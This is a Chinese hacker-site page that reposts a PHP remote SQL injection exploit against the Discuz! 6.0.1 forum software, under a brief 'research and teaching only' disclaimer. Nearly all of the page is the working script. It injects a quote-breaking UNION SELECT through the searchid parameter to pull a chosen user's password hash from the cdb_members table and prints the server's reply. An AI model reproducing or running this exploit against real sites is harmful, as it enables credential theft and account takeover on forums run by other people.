|
 |
您现在的位置: 红色黑客联盟 >> 教程 >> 黑客技术 >> Exploite >> 正文 |
| Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit |
|
|
|
| 文章录入:7747.Net 责任编辑:7747.Net |
|
|
【字体:小 大】 |
|
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!<?php error_reporting(E_ALL&E_NOTICE); print_r(" +------------------------------------------------------------------+ Exploit discuz6.0.1 Just work as php>=5 & mysql>=4.1 BY james +------------------------------------------------------------------+ ");
if($argc>4) { $host=$argv[1]; $port=$argv[2]; $path=$argv[3]; $uid=$argv[4]; }else{ echo "Usage: php ".$argv[0]." host port path uid\n"; echo "host: target server \n"; echo "port: the web port, usually 80\n"; echo "path: path to discuz\n"; echo "uid : user ID you wanna get\n"; echo "Example:\r\n"; echo "php ".$argv[0]." localhost 80 1\n"; exit; }
$content ="action=search&searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=".$uid."/*&do=submit";
$data = "POST /".$path."/index.php"." HTTP/1.1\r\n"; $data .= "Accept: */*\r\n"; $data .= "Accept-Language: zh-cn\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "User-Agent: wap\r\n"; $data .= "Host: ".$host."\r\n"; $data .= "Content-length: ".strlen($content)."\r\n"; $data .= "Connection: Close\r\n"; $data .= "\r\n"; $data .= $content."\r\n\r\n"; $ock=fsockopen($host,$port); if (!$ock) { echo 'No response from '.$host; die; } fwrite($ock,$data); while (!feof($ock)) { echo fgets($ock, 1024); } ?>
|
| |
| 您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力 |
|
|
| |
上一篇文章: FlashGet 1.9 (FTP PWD Response) 0day Remote Buffer Overflow PoC Exploit
下一篇文章: 没有了 |
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |